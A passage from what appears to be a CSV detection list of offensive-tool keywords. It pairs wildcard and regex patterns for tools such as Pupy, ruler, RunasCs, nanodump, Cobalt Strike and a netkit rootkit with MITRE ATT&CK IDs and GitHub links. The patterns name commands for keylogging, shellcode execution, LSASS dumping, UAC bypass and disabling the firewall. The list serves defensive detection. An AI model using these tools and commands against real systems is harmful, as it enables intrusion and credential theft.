TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*Rudrastra-main.zip*",".{0,1000}Rudrastra\-main\.zip.{0,1000}","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","8","1","61","20","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z" "*ruler * abk dump -o *",".{0,1000}ruler\s.{0,1000}\sabk\sdump\s\-o\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ruler --insecure *",".{0,1000}\/ruler\s\-\-email\s.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*ruler -k -d * brute --users *",".{0,1000}ruler\s\-k\s\-d\s.{0,1000}\sbrute\s\-\-users\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ruler -k --nocache --url ",".{0,1000}ruler\s\-k\s\-\-nocache\s\-\-url\s","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*ruler-linux64*",".{0,1000}ruler\-linux64.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*ruler-linux86*",".{0,1000}ruler\-linux86.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*ruler-osx64*",".{0,1000}ruler\-osx64.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*ruler-win64.exe*",".{0,1000}ruler\-win64\.exe.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*ruler-win86.exe*",".{0,1000}ruler\-win86\.exe.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*rules/d3ad0ne.rule*",".{0,1000}rules\/d3ad0ne\.rule.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*run * pyshell*",".{0,1000}run\s.{0,1000}\spyshell.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*run android_cam *",".{0,1000}run\sandroid_cam\s.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*run --bg shell_exec*",".{0,1000}run\s\-\-bg\sshell_exec.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*run DNSStager as root*",".{0,1000}run\sDNSStager\sas\sroot.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","10","6","598","132","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z" "*run -Executable *.exe*",".{0,1000}run\s\-Executable\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*run interactive_shell*",".{0,1000}run\sinteractive_shell.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*run keylogger*",".{0,1000}run\skeylogger.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*run memory_exec *.*",".{0,1000}run\smemory_exec\s.{0,1000}\..{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*run mouselogger*",".{0,1000}run\smouselogger.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*run post/windows/gather/checkvm*",".{0,1000}run\spost\/windows\/gather\/checkvm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit Callback Automation:Use AutoRunScript to run commands on a reverse shell callback","T1059 - T1064 - T1029","TA0002 - TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","1026","137","2024-04-30T15:57:18Z","2021-08-16T17:34:25Z" "*run post/windows/manage/killfw*",".{0,1000}run\spost\/windows\/manage\/killfw.{0,1000}","offensive_tool_keyword","metasploit","Metasploit Callback Automation:Use AutoRunScript to run commands on a reverse shell callback","T1059 - T1064 - T1029","TA0002 - TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","1026","137","2024-04-30T15:57:18Z","2021-08-16T17:34:25Z" "*run post/windows/manage/migrate*",".{0,1000}run\spost\/windows\/manage\/migrate.{0,1000}","offensive_tool_keyword","metasploit","Metasploit Callback Automation:Use AutoRunScript to run commands on a reverse shell callback","T1059 - T1064 - T1029","TA0002 - TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","1026","137","2024-04-30T15:57:18Z","2021-08-16T17:34:25Z" "*run pyexec *",".{0,1000}run\spyexec\s.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*run --rm -it xshuden/cheetah*",".{0,1000}run\s\-\-rm\s\-it\sxshuden\/cheetah.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","N/A","10","7","618","153","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z" "*run shell_exec *",".{0,1000}run\sshell_exec\s.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*run shellcode_exec*",".{0,1000}run\sshellcode_exec.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*Run the krbscm method for SYSTEM shell*",".{0,1000}Run\sthe\skrbscm\smethod\sfor\sSYSTEM\sshell.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","384","71","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" "*run thief:latest*",".{0,1000}run\sthief\:latest.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","176","33","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*run_kmod.sh netkit.ko netkit*",".{0,1000}run_kmod\.sh\snetkit\.ko\snetkit.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","N/A","10","1","17","3","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z" "*run_ppl_dump_exploit*",".{0,1000}run_ppl_dump_exploit.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*run_ppl_medic_exploit*",".{0,1000}run_ppl_medic_exploit.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*run_python.sh client/shell.py*",".{0,1000}run_python\.sh\sclient\/shell\.py.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","N/A","10","1","17","3","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z" "*run_server.bat",".{0,1000}run_server\.bat","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*runasadmin uac-cmstplua*",".{0,1000}runasadmin\suac\-cmstplua.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*runasadmin uac-token-duplication*",".{0,1000}runasadmin\suac\-token\-duplication.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*RunasCreateProcessAsUserW*",".{0,1000}RunasCreateProcessAsUserW.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*RunasCs.exe*",".{0,1000}RunasCs\.exe.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*RunasCs.exe*",".{0,1000}RunasCs\.exe.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*RunasCs.zip*",".{0,1000}RunasCs\.zip.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*RunasCs_net2.exe*",".{0,1000}RunasCs_net2\.exe.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*RunasCs_net2.exe*",".{0,1000}RunasCs_net2\.exe.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*RunasCsMain*",".{0,1000}RunasCsMain.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*RunasCs-master*",".{0,1000}RunasCs\-master.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*runas-netonly *",".{0,1000}runas\-netonly\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*runasppl_check*",".{0,1000}runasppl_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*RunAsWinTcb.exe*",".{0,1000}RunAsWinTcb\.exe.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","126","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*RunAsWinTcb-master*",".{0,1000}RunAsWinTcb\-master.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","126","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*RunCleanup-77740706-9DEC-EC11-BB3D-0022482CA4A7.json*",".{0,1000}RunCleanup\-77740706\-9DEC\-EC11\-BB3D\-0022482CA4A7\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" "*RunCodeExec-75740706-9DEC-EC11-BB3D-0022482CA4A7.json*",".{0,1000}RunCodeExec\-75740706\-9DEC\-EC11\-BB3D\-0022482CA4A7\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" "*run-dll SharpSploit*",".{0,1000}run\-dll\sSharpSploit.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*rundll32 charlotte.dll*",".{0,1000}rundll32\scharlotte\.dll.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","952","212","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" "*rundll32 merlin.dll,Magic*",".{0,1000}rundll32\smerlin\.dll,Magic.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - 